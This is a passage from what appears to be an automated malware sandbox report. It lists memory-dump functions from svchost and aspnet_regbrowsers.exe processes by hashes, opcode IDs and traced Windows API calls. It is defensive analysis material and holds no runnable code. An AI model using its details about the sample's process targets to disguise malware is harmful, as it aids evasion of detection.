                                • Instruction Fuzzy Hash: F7619E3160460A8FCB14DF58D4809AEFBF6FF84224B29C959D559DB211DB71EC46CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEF4E8, Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 666e8261716a9bca8cd7a44dd3edebac7d0b0e64436c5eeb61e5be69ebe86f6e
                                • Instruction ID: bdeae55f0fa7854d21afa69ac707f3b9d298ed8e97d16fd24149ced43b72af55
                                • Opcode Fuzzy Hash: 666e8261716a9bca8cd7a44dd3edebac7d0b0e64436c5eeb61e5be69ebe86f6e
                                • Instruction Fuzzy Hash: 6C511632B056108FC725DB65E88096BB7EAEFC561071AC87ED50AD7351CB31EC028790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEE278, Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30a036474c6ac1e930b4b899bdaf63078f9d6baf327317f4982fc977199db3d1
                                • Instruction ID: b178dd77eec5ea598a98abaecc361cd286abf69e2bbf9bc49a829cc47238ac26
                                • Opcode Fuzzy Hash: 30a036474c6ac1e930b4b899bdaf63078f9d6baf327317f4982fc977199db3d1
                                • Instruction Fuzzy Hash: 88414D342006019FD758EB34E458A6A77E3FFD9614B28CE6CD2478B760DF71AC468BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CED280, Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a538d27c31b4e48304feb35be99d61b91dbc659940b59b4afbab89dfdea1653
                                • Instruction ID: 13b4cbd09b5ea31c5d7faf114ef7e06192fbcad64452b5a00551e0f63aa1da6f
                                • Opcode Fuzzy Hash: 5a538d27c31b4e48304feb35be99d61b91dbc659940b59b4afbab89dfdea1653
                                • Instruction Fuzzy Hash: C6419130200B015FD368EF21D544B5AB7E2FF85224FA9CE9DC2569F6A1CF70B8098B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE05C7, Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b4ac7dbbbc2390ca1269f67e9da9ce31974675eb321b302cdd2b872e01234bf
                                • Instruction ID: 1cea2fa981b54b6b19803d9da122d14ed742c66f25ed984dedcc52d5588b6f21
                                • Opcode Fuzzy Hash: 2b4ac7dbbbc2390ca1269f67e9da9ce31974675eb321b302cdd2b872e01234bf
                                • Instruction Fuzzy Hash: F7316E34B101149FCB18DFA9C498AADBBF6AF8D714F258169E506DB7A0CBB4DC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0A28, Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c7bde63339e8d20a456f2d34f12fea16193babddd668dea62ddf5fcb2ea597a8
                                • Instruction ID: 7f666edc6d41bc8464103137e97510f1536d07d918a8b452bc3b3c6402a635ac
                                • Opcode Fuzzy Hash: c7bde63339e8d20a456f2d34f12fea16193babddd668dea62ddf5fcb2ea597a8
                                • Instruction Fuzzy Hash: C431A071B002184FCB089BBA88506BF77BBEBC9610F69806DE50AD3355DF799D029791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE05D8, Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a01a1686d880cf6d8907e362eeabfabb90347301073fcbd6001ba5724b1daf23
                                • Instruction ID: 439e1eeb22c250499d547dd4f21339592dcd66e367b1e6507c40d5dfd40d609d
                                • Opcode Fuzzy Hash: a01a1686d880cf6d8907e362eeabfabb90347301073fcbd6001ba5724b1daf23
                                • Instruction Fuzzy Hash: DA315E30B101149FCB14DFA9C498A6DBBF6AF8D714F1581A9E506DB761CBB0DC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CED830, Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01763b064a59556dbb962ef230a61c53a9081319095c7b188dd4ec6543291b31
                                • Instruction ID: 8be6c36b24d32e9f51b05af74d5f350e503739a04e002f64b4ae7dc5355f542f
                                • Opcode Fuzzy Hash: 01763b064a59556dbb962ef230a61c53a9081319095c7b188dd4ec6543291b31
                                • Instruction Fuzzy Hash: 7F212C347006015BE718BA71A854B7E22D3EBD1624F1DCD2DD602AB294DF71AC4A57E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01B5D110, Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.803658156.0000000001B5D000.00000040.00000001.sdmp, Offset: 01B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_1b5d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2917a37f6e82234af75eaa2660ff904ab7af4e5ef35c6f972cdb1ea20f88098b
                                • Instruction ID: f6394993755e0f134aceb23d3ad319e439cdf44bb376b7d12efad6f0fa229823
                                • Opcode Fuzzy Hash: 2917a37f6e82234af75eaa2660ff904ab7af4e5ef35c6f972cdb1ea20f88098b
                                • Instruction Fuzzy Hash: 15212271604204DFDB49CFA5D8C0B26BBA5FB84714F24CBADED094B346C336D846CA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEEF48, Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 157242c2d35519a8842e2c92e8d8863c78848c6a5c8a695042affb65d0af6f35
                                • Instruction ID: cb4e5bfc983d9199de53d8cf6e54977fb37dbd9277ac9e4d63ec2e410b2b3a88
                                • Opcode Fuzzy Hash: 157242c2d35519a8842e2c92e8d8863c78848c6a5c8a695042affb65d0af6f35
                                • Instruction Fuzzy Hash: 6611E7352046458FC710DB18D480C66FBEAAF453A4729CEAAE45AC7752D730FC46C791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE08C0, Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3294c5e098798065ce29242c5eac8139c7641e437b828ec15f840bc5dd7eb2b7
                                • Instruction ID: 489f16b01614a6ad857ed6fed0170234db92dd19ecd54c1fed5fca011597db79
                                • Opcode Fuzzy Hash: 3294c5e098798065ce29242c5eac8139c7641e437b828ec15f840bc5dd7eb2b7
                                • Instruction Fuzzy Hash: 9A21BC70A04B068FD770DF2AD848656B7F1BB48320B108F2DD4AAD76A4E7B4E645CBD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CED948, Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49f346b1a2353812024932671e88b6385438793feecf20ce8229c8b1e9a5e88c
                                • Instruction ID: 6ee4d0db467204041fe10f035736377b81ae18fb8c841436575f7a8e414c1c0b
                                • Opcode Fuzzy Hash: 49f346b1a2353812024932671e88b6385438793feecf20ce8229c8b1e9a5e88c
                                • Instruction Fuzzy Hash: B6119A357007128FD724EBA8D88492EB7A6FFC4268B158A2DD64B8B710DF71ED058B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE91E0, Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1f132f2e003cfc55cebf7998184924772d95a28452e3222c9373998a5e44883
                                • Instruction ID: 642b0b8dedb43ad6988dc79a6bbcd875e384bce70eb6fdb1c49b9a5964a8e9c6
                                • Opcode Fuzzy Hash: a1f132f2e003cfc55cebf7998184924772d95a28452e3222c9373998a5e44883
                                • Instruction Fuzzy Hash: F21108713046045BCB24EF69E451A6EB7A7BFC4254F508D2DD54A8B790DF70DC058BB1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01B5D10B, Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.803658156.0000000001B5D000.00000040.00000001.sdmp, Offset: 01B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_1b5d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction ID: e562ce98a6e583c42556010d7a83c187959a22c1e56267a004fc50d1fd19c382
                                • Opcode Fuzzy Hash: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction Fuzzy Hash: E611A975504280CFDB0ACF54D984B15BBA1EB84224F28C6AADC494B656C33AD44ACB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE92A0, Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f5945f05146feff2ad0268f6158b2067844a44aac848851cbf6e3fbf5a7a9b2e
                                • Instruction ID: 458d3fca2ac7d73033184d48280854d46d2393e16afc1ed3a74e9b7e8bf052c9
                                • Opcode Fuzzy Hash: f5945f05146feff2ad0268f6158b2067844a44aac848851cbf6e3fbf5a7a9b2e
                                • Instruction Fuzzy Hash: D7116030A042098BDB14DF6AD5586EEB7B2FF8C600F24C869D402B7394DB745D44CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CECC60, Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43f81539b61d733817681ff278364e7e89771701154719c56d313f4075eecdae
                                • Instruction ID: 141c6c1b105784105c5bce117731d6158f0622c20a25a44c4f7ef5bdcf78d0ee
                                • Opcode Fuzzy Hash: 43f81539b61d733817681ff278364e7e89771701154719c56d313f4075eecdae
                                • Instruction Fuzzy Hash: 2C1154302047015B8728DF25E44485AB7A7FFC5628324CE6DD15A8B250DF71AC068BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE04F8, Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c3423c59ddae239dcef1ff2941dbcf96aed867c5f74d559479f44c93884dd0a1
                                • Instruction ID: a7c283305f67043244bd0ec69cca10b622979699692da9b1317eead8f746d881
                                • Opcode Fuzzy Hash: c3423c59ddae239dcef1ff2941dbcf96aed867c5f74d559479f44c93884dd0a1
                                • Instruction Fuzzy Hash: A8017031A043009FCB199B74E4487A83BE5EF46505F2644D5D80BDB363DF65DC4287D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0458, Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 96fd50b7b867d623e8b198e3d27959e4af422ef62b79f3a98bb17bf55aa9a988
                                • Instruction ID: e30890b7bae4c33a7f4abd9b76322c1753240162b7d9fa61b026d1c383335e96
                                • Opcode Fuzzy Hash: 96fd50b7b867d623e8b198e3d27959e4af422ef62b79f3a98bb17bf55aa9a988
                                • Instruction Fuzzy Hash: 8301D43D7003106BDB0913A869117F92777EFC6B08F20809DEA01ABBC6CAFE1C155752
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0468, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e03ad6a143097f741ceb33e5a405a0f9b2b063a67fa6357e731df35df4e632e5
                                • Instruction ID: b4b88d8375db2c9c555d89f985f28a52aed06df03ddc6fe0680b34796adb3dea
                                • Opcode Fuzzy Hash: e03ad6a143097f741ceb33e5a405a0f9b2b063a67fa6357e731df35df4e632e5
                                • Instruction Fuzzy Hash: 28F0313D74021467EA0816A86D117F92767DBC9B04F10805DE6056ABCACEFB6C155396
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0521, Relevance: .0, Instructions: 41COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d86bec1f1b2172b72f3e2907d82cc81296524938547c4a59f5ace29208db5ef1
                                • Instruction ID: c803110f07a2732971844e1416e74c92062c403ad5df1bb50ca070efae51f3ea
                                • Opcode Fuzzy Hash: d86bec1f1b2172b72f3e2907d82cc81296524938547c4a59f5ace29208db5ef1
                                • Instruction Fuzzy Hash: ED01F9357001008FCB58DB78D444A6933E6EFC961172180A8ED0ADB365CF75DC518791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0260, Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75532d493ce1a66193d830445cf06e8ce7b27790fd5f03dc2a5c5a1e8304e259
                                • Instruction ID: de8b4f5db7afb05cd4a4b07ed9edf74ce45d336992c88d665aec82496655e7cf
                                • Opcode Fuzzy Hash: 75532d493ce1a66193d830445cf06e8ce7b27790fd5f03dc2a5c5a1e8304e259
                                • Instruction Fuzzy Hash: F9E026303402205FC710DB79D804B6477E99F8C621F1480A9FA4ACB3A2EA609C50C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0B58, Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 514bf65e24d4d5b417ce14cb6379fe170e4fc9c678d2f2f414526e634677b11f
                                • Instruction ID: 5d6f0f7fb34d844685d488659dbaeea9648f63e63961500dbca22623dbf6429e
                                • Opcode Fuzzy Hash: 514bf65e24d4d5b417ce14cb6379fe170e4fc9c678d2f2f414526e634677b11f
                                • Instruction Fuzzy Hash: 7CE0DF7090628ADFCB99DF74AA0169D7BB1EF01208B2084DEDC08E3251E7341E04A700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEDA30, Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43ef983df146c931269ae7618af7848d9f7e876bf1f9c728f5c9e8b29084a1a8
                                • Instruction ID: cca4564b3a7c8079984496ccb233763c4c92a2faaeebfce38e0701a3cc9643d2
                                • Opcode Fuzzy Hash: 43ef983df146c931269ae7618af7848d9f7e876bf1f9c728f5c9e8b29084a1a8
                                • Instruction Fuzzy Hash: 35E0B674E0420CAFCB44EFB8E44459DBBF5AF48218F0185E99909E7350EB746E44CF81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE8D20, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32858bbbdef938a9b45c3b6ead1e9cd60591bc422355cdabfaa1f7efe629f79b
                                • Instruction ID: ef256c8145c5b9170017bca3398a996205c995753ad8b83e241d09c7c1f59a95
                                • Opcode Fuzzy Hash: 32858bbbdef938a9b45c3b6ead1e9cd60591bc422355cdabfaa1f7efe629f79b
                                • Instruction Fuzzy Hash: 29D0A932B001204F8708EBACE80489833EAAF8A12530080AAE00ACB331DE20EC81C780
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0B68, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bf971a1122bc4ae72759a5159d6a68b36d032653ae525947a80be0c89be8aa3
                                • Instruction ID: 62a8dc6571bbe2f47af91aa72e8101d58f47398248bce78f5ecf6a3b82acd06d
                                • Opcode Fuzzy Hash: 0bf971a1122bc4ae72759a5159d6a68b36d032653ae525947a80be0c89be8aa3
                                • Instruction Fuzzy Hash: 10D01270901109EF8B84DFA9E60155DB7F9EB44104B1085D9D808D3210DB312E009740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0530, Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55c20adcde1018b6330a5d3fe3266cbc2fea2e86e596031e0f2f2acd3345d13b
                                • Instruction ID: a2fbe0bb439c72f16f67e6a1c8631fb55c9f7ed2b1641f76498db6d2af03c257
                                • Opcode Fuzzy Hash: 55c20adcde1018b6330a5d3fe3266cbc2fea2e86e596031e0f2f2acd3345d13b
                                • Instruction Fuzzy Hash: 6BD0A7347402448FC744DF78E04492573B6EBC96113208098ED0DCB366CF31EC508B51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEDA08, Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40c45618b0857e2ec126c04f680551870e2d400efda1415b15aa9100579cca5f
                                • Instruction ID: 9d7f6caa3995c045baf81117a0c16e5ba3a3906771641ece32c80aacf67b32f9
                                • Opcode Fuzzy Hash: 40c45618b0857e2ec126c04f680551870e2d400efda1415b15aa9100579cca5f
                                • Instruction Fuzzy Hash: 30B0927090930CAF8610DAA9980191AB7ACDA0A118B0206D9EA0887310DA72AD105AD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEE518, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ff00fb279385ad464e502bef8441b5703e6172921154b95bc462c4907efb7f6f
                                • Instruction ID: 2cddb018488413d2e90e2148d919d9f5f7439e99c802e76cb6ac4abc24c95eea
                                • Opcode Fuzzy Hash: ff00fb279385ad464e502bef8441b5703e6172921154b95bc462c4907efb7f6f
                                • Instruction Fuzzy Hash: 1DB0127004470D6F8680BBA0F406C54371D968061D7808D50D20C860319EA468D58688
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEF140, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9356bb5ccea945c8e034a45183a01d6285c27660127d61ddd53b35643ccf2328
                                • Instruction ID: 1838e275c2923d5f917afa2e05ff59c94d8e1526511b89e3e20eccd99f6f36e6
                                • Opcode Fuzzy Hash: 9356bb5ccea945c8e034a45183a01d6285c27660127d61ddd53b35643ccf2328
                                • Instruction Fuzzy Hash: 1DB0123000860D8B8740EBA4F60548C372D96C051D790C550970C874165E686854468C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: aspnet_regbrowsers.exe PID: 4588 Parent PID: 4876 aspnet_regbrowsers.exeCOMMON

                                Execution Graph

                                Execution Coverage:6.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:63
                                Total number of Limit Nodes:4

                                Graph

                                execution_graph 24048 13a6d28 DuplicateHandle 24049 13a6dbe 24048->24049 24050 13a5408 24051 13a542e 24050->24051 24054 13a3d74 24051->24054 24057 13a3d7f 24054->24057 24055 13a79a1 24059 13a799f 24055->24059 24070 13a6a34 24055->24070 24057->24055 24058 13a7991 24057->24058 24062 13a7ab8 24058->24062 24066 13a7ac8 24058->24066 24065 13a7ad6 24062->24065 24063 13a6a34 CallWindowProcW 24063->24065 24064 13a7bbf 24064->24059 24065->24063 24065->24064 24068 13a7ad6 24066->24068 24067 13a6a34 CallWindowProcW 24067->24068 24068->24067 24069 13a7bbf 24068->24069 24069->24059 24071 13a6a3f 24070->24071 24072 13a7c8a CallWindowProcW 24071->24072 24073 13a7c39 24071->24073 24072->24073 24073->24059 24044 13a5250 24045 13a52b8 CreateWindowExW 24044->24045 24047 13a5374 24045->24047 24074 13aba20 24075 13aba34 24074->24075 24078 13abc6a 24075->24078 24076 13aba3d 24079 13abc73 24078->24079 24084 13abe4c 24078->24084 24088 13abe66 24078->24088 24092 13abd40 24078->24092 24096 13abd50 24078->24096 24079->24076 24085 13abdff 24084->24085 24086 13abe8b 24085->24086 24100 13ac147 24085->24100 24089 13abe79 24088->24089 24090 13abe8b 24088->24090 24091 13ac147 2 API calls 24089->24091 24091->24090 24093 13abd94 24092->24093 24094 13abe8b 24093->24094 24095 13ac147 2 API calls 24093->24095 24095->24094 24097 13abd94 24096->24097 24098 13abe8b 24097->24098 24099 13ac147 2 API calls 24097->24099 24099->24098 24101 13ac166 24100->24101 24105 13ac1a8 24101->24105 24109 13ac198 24101->24109 24102 13ac176 24102->24086 24106 13ac1e2 24105->24106 24107 13ac235 24106->24107 24108 13ac20c RtlEncodePointer 24106->24108 24107->24102 24108->24107 24110 13ac1a8 24109->24110 24111 13ac20c RtlEncodePointer 24110->24111 24112 13ac235 24110->24112 24111->24112 24112->24102 24113 13a6b00 GetCurrentProcess 24114 13a6b7a GetCurrentThread 24113->24114 24115 13a6b73 24113->24115 24116 13a6bb0 24114->24116 24117 13a6bb7 GetCurrentProcess 24114->24117 24115->24114 24116->24117 24120 13a6bed 24117->24120 24118 13a6c15 GetCurrentThreadId 24119 13a6c46 24118->24119 24120->24118

                                Executed Functions

                                Function 013A6AE5, Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013A6B60
                                • GetCurrentThread.KERNEL32 ref: 013A6B9D
                                • GetCurrentProcess.KERNEL32 ref: 013A6BDA
                                • GetCurrentThreadId.KERNEL32 ref: 013A6C33
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_13a0000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 869a8d7e233ea23406d619c6228889b8675aa768de4eaa54a90184dd575705c3
                                • Instruction ID: 9866a8bdb7e0e9d4fc29925a305af7b29b2e13f42e6e1f51511e77301d1224fa
                                • Opcode Fuzzy Hash: 869a8d7e233ea23406d619c6228889b8675aa768de4eaa54a90184dd575705c3
                                • Instruction Fuzzy Hash: 9E5188B09042888FDB54CFAAD549BDEBFF0EF89304F24849EE559A7391DB345884CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 013A6B00, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 013A6B60
                                • GetCurrentThread.KERNEL32 ref: 013A6B9D
                                • GetCurrentProcess.KERNEL32 ref: 013A6BDA
                                • GetCurrentThreadId.KERNEL32 ref: 013A6C33
                                Memory Dump Source
                                • Source File: 00000025.00000002.937374651.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                                Joe Sandbox IDA Plugin
